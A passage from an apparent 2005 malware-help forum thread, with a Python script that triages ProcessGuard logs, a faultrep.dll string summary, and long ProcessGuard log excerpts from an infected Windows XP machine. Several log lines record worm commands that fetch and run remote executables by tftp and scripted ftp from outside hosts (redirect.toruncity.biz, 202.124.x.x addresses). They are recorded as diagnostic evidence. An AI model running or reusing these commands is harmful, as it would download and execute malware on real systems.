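Wed 09 - 19:07:11 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Wed 09 - 19:21:30 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [492]
[EXECUTION] Commandline - [ cmd /c echo open ftp.example.invalid >a.dll &ftp.exe -n -s:a.dll ]
Wed 09 - 20:09:08 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [652]
[EXECUTION] Commandline - [ tftp.exe -i 0.0.0.0 get msupdate32.exe
Wed 09 - 20:12:15 [EXECUTION] "c:\windows\system32\gbzhy.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [652]
[EXECUTION] Commandline - [ "gbzhy.exe" ]
Thu 10 - 19:22:43 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running
[EXECUTION] Started by "Unknown Process" [916]
[EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\temp\manifest.txt ]
Thu 10 - 19:30:00 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1068]
"""

@dataclass
class ExecEvent:
    ts: str
    image: str
    blocked: bool
    parent: str = "?"
    parent_pid: int = 0
    cmdline: str = ""

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path or bare command."""
    return path.rsplit("\\", 1)[-1].strip('"').lower()

def parse_pg_log(text: str) -> List[ExecEvent]:
    """Group each three-line [EXECUTION] record into one event; skip the header and [TERMINATE] lines."""
    events: List[ExecEvent] = []
    for line in text.splitlines():
        line = line.rstrip()
        m = EXEC_RE.match(line)
        if m:
            events.append(ExecEvent(m["ts"], m["image"].lower(), m["verdict"].startswith("blocked")))
            continue
        if not events:          # header or stray line before the first record
            continue
        m = PARENT_RE.match(line)
        if m:
            events[-1].parent, events[-1].parent_pid = m["parent"].lower(), int(m["pid"])
            continue
        m = CMD_RE.match(line)
        if m:
            events[-1].cmdline = m["cmd"]
    return events

def triage(events: List[ExecEvent]) -> List[Tuple[str, ExecEvent, str]]:
    """Return (severity, event, reason), highest severity first and, within a severity,
    allowed executions before blocked ones (an allowed one means PG's policy let it through)."""
    findings = []
    for ev in events:
        img, par, cmd = basename(ev.image), basename(ev.parent), ev.cmdline.lower()
        if img in TRANSFER_TOOLS and par in SERVICE_LEVEL:
            findings.append(("HIGH", ev, f"{img} launched by service-level process {par}"))
        elif "tftp" in cmd or ("ftp.exe" in cmd and "-s:" in cmd):
            findings.append(("HIGH", ev, "command line drives a scripted file transfer"))
        elif "\\system32\\" in ev.image and par in SERVICE_LEVEL and img not in CORE_PROCESSES | USUALLY_OK:
            findings.append(("MEDIUM", ev, f"unlisted system32 executable {img} started by {par}"))
        elif ev.parent == "unknown process":
            findings.append(("INFO", ev, "parent process could not be identified"))
    rank = {"HIGH": 0, "MEDIUM": 1, "INFO": 2}
    findings.sort(key=lambda f: (rank[f[0]], f[1].blocked))
    return findings

if __name__ == "__main__":
    for sev, ev, why in triage(parse_pg_log(SAMPLE_LOG)):
        state = "BLOCKED" if ev.blocked else "ALLOWED"
        print(f"[{sev:6}] {ev.ts} {state} {ev.image} <- {ev.parent} [{ev.parent_pid}]: {why}")
```

Point `parse_pg_log` at the text of a real pglog_*.txt to get the same listing; a HIGH finding marked ALLOWED is the one to look at first, since it means the Security tab still permits that launch.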

#224 Metallica (Spyware Veteran, GeekU Moderator, 31,942 posts)
Can you try and find manifest.txt?

I'm curious about its content if it exists.

Regards,

#225 duglartis (Member, Topic Starter, 159 posts)
Found this under manifest.txt, hope it makes sense. Cheers
C:\WINDOWS\SYSTEM32\faultrep.dll (65 KB, 31/03/2003 12:00:00)

C:\WINDOWS\SYSTEM32\dllcache\faultrep.dll (65 KB, 31/03/2003 12:00:00)
2 [chunks 2 to 4 of the binary string dump of faultrep.dll; PE header bytes and other unreadable binary omitted. Readable strings, chunk 2: .text/.data/.rsrc/.reloc sections; imports ntdll.dll, VERSION.dll, USERENV.dll, WINSTA.dll, WTSAPI32.dll, SETUPAPI.dll, KERNEL32.dll, USER32.dll, ADVAPI32.dll; Software\Microsoft\PCHealth\ErrorReporting\ExclusionList; Kernel fault / Unplanned shutdown / Unknown event / Application Hang; appcompat.txt, .mdmp, manifest.txt, errorlog.log, hungapp, dumprep.exe, dwwin.exe; "%02d-%02d-%04d %02d:%02d:%02d Hang fault for %ls".
3 Chunk 3: watson.microsoft.com; SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug (Debugger, Auto); the Run entry UserFaultCheck = %systemroot%\system32\dumprep 0 -u; SOFTWARE\Microsoft\PCHealth\ErrorReporting\UserFaults; %ls.%04d%02d%02d-%02d%02d%02d-00.mdmp; PCHealth\ErrorRep\UserDumps\WINDOWS.mdmp; %ls\dwwin.exe -x -s %lu; HKLM\Software\Microsoft\Windows NT\CurrentVersion\DigitalProductId; Microsoft\PCHealth\ErrorReporting\DW; MaxUserQueueSize; \\.\pipe\PCHFaultRepExecPipe; Winsta0\Default; "%02d-%02d-%04d %02d:%02d:%02d User fault %08x in %ls".
4 Chunk 4: System Error / Application Error / Application Hang; %ls\dwwin.exe -d %ls; %ls\dumprep.exe %ld -dm 7 7 %ls %I64d; watson.microsoft.com Stage1URL/Stage2URL templates (stagetwo.asp, ShutdownTwo.asp, bluetwo.asp); dbghelp.dll / MiniDumpWriteDump; Microsoft\PCHealth\ErrorReporting\DW, SOFTWARE\Microsoft\Windows\CurrentVersion\Run, SOFTWARE\Microsoft\PCHealth\ErrorReporting\KernelFaults and \ShutdownEvents; KernelFaultCheck = %systemroot%\system32\dumprep 0 -k and ShutdownEventCheck = %systemroot%\system32\dumprep 0 -s; sysdata.xml, manifest.txt, errorlog.log; and the <SYSTEMINFO> driver/device XML template with OSNAME/OSVER/OSLANGUAGE, DEVICE/DESCRIPTION/HARDWAREID/SERVICE and DRIVER/FILENAME/FILESIZE/CREATIONDATE/VERSION/MANUFACTURER/PRODUCTNAME elements and the Windows edition names.]

C:\Program Files\ProcessGuard\logs\pglog_08_2005.txt (1261 KB, 31/08/2005 20:52:00)
0 [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds5b2b862b70f37c4dbf67c67390c07da4 ]
Mon 08 - 21:24:24 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds57457864364a214fabff9a60bd5ef97e ]
Mon 08 - 21:25:03 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1016]
  [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Mon 08 - 21:26:54 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\lsass.exe" [492]
  [EXECUTION] Commandline - [ cmd /c tftp -i 10.1.0.45 get msnupdates.exe&start msnupdates.exe&exit ]
Mon 08 - 21:28:55 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ cmd ]
Mon 08 - 21:54:25 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 1684 -h 1696 "global\01c91f73f841019c1ac" ]
Mon 08 - 21:54:25 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds6380df6412c09e4bb6b97e441551afde ]
Mon 08 - 21:54:25 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsac55cc3b4bb3c6478175f23cadf0f8c9 ]
Mon 08 - 21:54:34 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running
  [EXECUTION] Started by "Unknown Process" [848]
  [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer3.tmp.dir00\manifest.txt ]
Mon 08 - 21:54:36 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1016]
  [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Mon 08 - 21:56:04 [EXECUTION] "c:\program files\outlook express\msimn.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1016]
  [EXECUTION] Commandline - [ "c:\program files\outlook express\msimn.exe" ]
Mon 08 - 21:56:08 [EXECUTION] "c:\program files\messenger\msmsgs.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [652]
  [EXECUTION] Commandline - [ "c:\program files\messenger\msmsgs.exe" -embedding ]
Mon 08 - 21:57:09 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
  [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [2008]
  [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" ]
Mon 08 - 21:57:44 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run
  [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avginet.exe" [1464]
  [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /update "c:\documents and settings\all users\application data\grisoft\avg7data\avg7upd\install\u-fwd.idx" ]
Mon 08 - 21:58:07 [EXECUTION] "c:\program files\grisoft\avg free\avgwb.dat" was allowed to run
  [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [2008]
  [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgwb.dat" /switchui ]
Mon 08 - 21:59:19 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1016]
  [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Mon 08 - 22:10:05 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436]
  [EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
---Process Guard Log Started---
Wed 10 - 16:39:50 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\services.exe" [476]
  [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Wed 10 - 16:39:51 [EXECUTION] "
0 [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds55e3ee1818e6574094c9c6d2613b5733 ]
Wed 10 - 21:15:48 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds3826709400a7474eba07c3cc8f09a8fd ]
Wed 10 - 21:15:48 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds173914a66e43e7438818165a583c411f ]
Wed 10 - 21:19:35 [EXECUTION] "c:\program files\outlook express\msimn.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1016]
  [EXECUTION] Commandline - [ "c:\program files\outlook express\msimn.exe" ]
Wed 10 - 21:19:38 [EXECUTION] "c:\program files\messenger\msmsgs.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [652]
  [EXECUTION] Commandline - [ "c:\program files\messenger\msmsgs.exe" -embedding ]
Wed 10 - 21:20:43 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ tftp.exe -i 202.124.151.118 get msconfig32.exe ]
Wed 10 - 21:20:58 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 932 -h 1944 "global\05d5973f841819c79c" ]
Wed 10 - 21:21:02 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 932 -h 1944 "global\05dfc83f841819c1ac" ]
Wed 10 - 21:21:13 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running
  [EXECUTION] Started by "Unknown Process" [2008]
  [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer3.tmp.dir00\manifest.txt ]
Wed 10 - 21:21:24 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\lsass.exe" [492]
  [EXECUTION] Commandline - [ cmd /c echo open redirect.toruncity.biz 5192 >socket64.dll &echo user http http >>socket64.dll &echo binary >>socket64.dll &echo get >>socket64.dll &echo o.exe >>socket64.dll &echo o.exe >>socket64.dll &echo bye >>socket64.dll &ftp.exe -n -s:socket64.dll &del socket64.dll &o.exe ]
Wed 10 - 21:43:00 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436]
  [EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Wed 10 - 21:43:29 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1052]
---Process Guard Log Started---
Wed 10 - 21:44:34 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\services.exe" [480]
  [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Wed 10 - 21:44:34 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1300]
  [EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Wed 10 - 21:44:35 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\services.exe" [480]
  [EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Wed 10 - 21:44:37 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1008]
  [EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Wed 10 - 21:44:37 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1008]
  [EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Wed 10 - 21:44:38 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1008]
  [EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Wed 10 - 21:44:38 [EXECUTION] "c:
0 l\u-fwd.idx" ]
Fri 12 - 20:42:03 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
  [EXECUTION] Commandline - [ cmd ]
Fri 12 - 20:42:50 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ tftp.exe -i 202.124.159.134 get msconfig32.exe ]
Fri 12 - 20:43:49 [EXECUTION] "c:\windows\system32\taskmgr.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432]
  [EXECUTION] Commandline - [ taskmgr.exe ]
Fri 12 - 20:44:56 [EXECUTION] "c:\windows\system32\taskmgr.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432]
  [EXECUTION] Commandline - [ taskmgr.exe ]
Fri 12 - 20:54:19 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1004]
  [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" shell32.dll,control_rundll "c:\windows\system32\appwiz.cpl",add or remove programs ]
Fri 12 - 20:54:26 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1004]
  [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" shell32.dll,control_rundll "c:\windows\system32\appwiz.cpl",add or remove programs ]
Fri 12 - 21:03:59 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
  [EXECUTION] Commandline - [ cmd /k echo open 202.124.147.59 26256 > o&echo user 1 1 >> o &echo get winshell.exe >> o &echo quit >> o &ftp -n -s:o &del /f /q o &winshell.exe ]
Fri 12 - 21:04:40 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 780 -h 756 "global\01c32813ec468198554" ]
Fri 12 - 21:04:54 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running
  [EXECUTION] Started by "Unknown Process" [608]
  [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer3.tmp.dir00\manifest.txt ]
Fri 12 - 21:05:04 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432]
  [EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Fri 12 - 21:05:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds622b120e90904f43ba58b4f14b52036c ]
Fri 12 - 21:05:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds194505682353974ab532df7982222e75 ]
---Process Guard Log Started---
Fri 12 - 21:06:53 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\services.exe" [480]
  [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Fri 12 - 21:06:53 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1284]
  [EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Fri 12 - 21:06:54 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\services.exe" [480]
  [EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Fri 12 - 21:06:56 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1012]
  [EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Fri 12 - 21:06:56 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1012]
  [EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Fri 12 - 21:06:57 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1012]
  [EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Fri 12 - 21:06:57 [E
0 UTION] Commandline - [ cmd /c echo open redirect.toruncity.biz 5192 >socket64.dll &echo user http http >>socket64.dll &echo binary >>socket64.dll &echo get >>socket64.dll &echo o.exe >>socket64.dll &echo o.exe >>socket64.dll &echo bye >>socket64.dll &ftp.exe -n -s:socket64.dll &del socket64.dll &o.exe ]
Fri 19 - 15:24:21 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1016]
  [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Fri 19 - 15:25:34 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1016]
  [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Fri 19 - 15:26:06 [EXECUTION] "d:\unzipped\ymsgrau.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1016]
  [EXECUTION] Commandline - [ "d:\unzipped\ymsgrau.exe" ]
Fri 19 - 15:26:11 [EXECUTION] "c:\documents and settings\dug and tania\locals~1\temp\glb3.tmp" was allowed to run
  [EXECUTION] Started by "d:\unzipped\ymsgrau.exe" [1660]
  [EXECUTION] Commandline - [ c:\docume~1\dugand~1\locals~1\temp\glb3.tmp 4736 d:\unzipped\ymsgrau.exe ]
Fri 19 - 15:28:04 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf9bef274a859c945977989e1a692e9be ]
Fri 19 - 15:28:04 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsba2b5c765be29f47bfa13fb717c5f8cd ]
Fri 19 - 15:29:52 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 1776 -h 1604 "global\01e56b93f848019c1bc" ]
Fri 19 - 15:30:08 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running
  [EXECUTION] Started by "Unknown Process" [540]
  [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wera.tmp.dir00\manifest.txt ]
Fri 19 - 15:30:22 [EXECUTION] "d:\unzipped\ymsgrau.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1016]
  [EXECUTION] Commandline - [ "d:\unzipped\ymsgrau.exe" ]
Fri 19 - 15:30:25 [EXECUTION] "c:\documents and settings\dug and tania\locals~1\temp\glbb.tmp" was allowed to run
  [EXECUTION] Started by "d:\unzipped\ymsgrau.exe" [1688]
  [EXECUTION] Commandline - [ c:\docume~1\dugand~1\locals~1\temp\glbb.tmp 4736 d:\unzipped\ymsgrau.exe ]
Fri 19 - 15:33:00 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 980 -h 1464 "global\02135863f848019c1ac" ]
Fri 19 - 15:33:05 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running
  [EXECUTION] Started by "Unknown Process" [1168]
  [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer12.tmp.dir00\manifest.txt ]
Fri 19 - 15:33:30 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1016]
  [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Fri 19 - 15:33:49 [EXECUTION] "d:\program files\messenger\ypager.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1016]
  [EXECUTION] Commandline - [ "d:\program files\messenger\ypager.exe" ]
Fri 19 - 15:34:00 [EXECUTION] "c:\windows\regedit.exe" was allowed to run
  [EXECUTION] Started by "d:\program files\messenger\ypager.exe" [1592]
  [EXECUTION] Commandline - [ c:\windows\regedit.exe /s "d:\program files\messenger\viewinfo.reg" ]
Fri 19 - 15:34:04 [EXECUTION] "c:\windows\regedit.exe" was allowed to run
  [EXECUTION] Started by "d:\program files\messenger\ypager.exe" [1592]
  [EXECUTION] Commandline - [ c:\windows\regedit.exe /s "d:\program files\messenger\intl.reg" ]
Fri 19 - 15:34:07 [EXECUTION] "c:\windows\regedit.exe" was allowed to run
  [EXECUTION] Started by "d:\program files\messenger\ypager.exe" [1592]
  [EXECUTION] Commandline - [ c:\windows\regedit.exe /s "d:\program files\messenger\viewinfo.reg" ]
Fri 19 - 15:34:10 [EXECUTION] "c:\windows\regedit.exe" was allowed to run
0 [EXECUTION] Started by "c:\program files\real\realone player\realplay.exe" [3216]
  [EXECUTION] Commandline - [ code::shortcutc:\documents and settings\dug and tania\application data\real\realone player\history\\-script-document.write(pagetitle);--script-.lnkc:\program files\real\realone player\realplay.exe file://c:\program%20files\real\realone%20player\datacache\getmedia\home.htmlrealone player web pa ]
Fri 19 - 15:51:34 [EXECUTION] "c:\windows\system32\taskmgr.exe" was blocked from running
  [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436]
  [EXECUTION] Commandline - [ taskmgr.exe ]
Fri 19 - 15:51:43 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 872 -h 928 "global\03256d73f848019c55c" ]
Fri 19 - 15:51:54 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running
  [EXECUTION] Started by "Unknown Process" [3652]
  [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer1b.tmp.dir00\manifest.txt ]
Fri 19 - 15:51:56 [EXECUTION] "c:\program files\common files\real\update_ob\realevent.exe" was blocked from running
  [EXECUTION] Started by "c:\program files\common files\real\update_ob\realsched.exe" [3292]
  [EXECUTION] Commandline - [ "c:\program files\common files\real\update_ob\realevent.exe" "c:\program files\common files\real\update_ob\faus3270.dll" rnathappshutdown_1 1 ]
Fri 19 - 15:51:59 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
  [EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 2556 -h 2560 "global\03296413f848019c1bc" ]
Fri 19 - 15:52:08 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running
  [EXECUTION] Started by "Unknown Process" [3704]
  [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer1c.tmp.dir00\manifest.txt ]
Fri 19 - 15:52:08 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436]
  [EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
---Process Guard Log Started---
Fri 19 - 15:53:43 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\services.exe" [480]
  [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Fri 19 - 15:53:43 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1296]
  [EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Fri 19 - 15:53:44 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\system32\services.exe" [480]
  [EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Fri 19 - 15:53:48 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1012]
  [EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Fri 19 - 15:53:48 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1012]
  [EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Fri 19 - 15:53:48 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
  [EXECUTION] Started by "c:\windows\explorer.exe" [1012]
  [EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
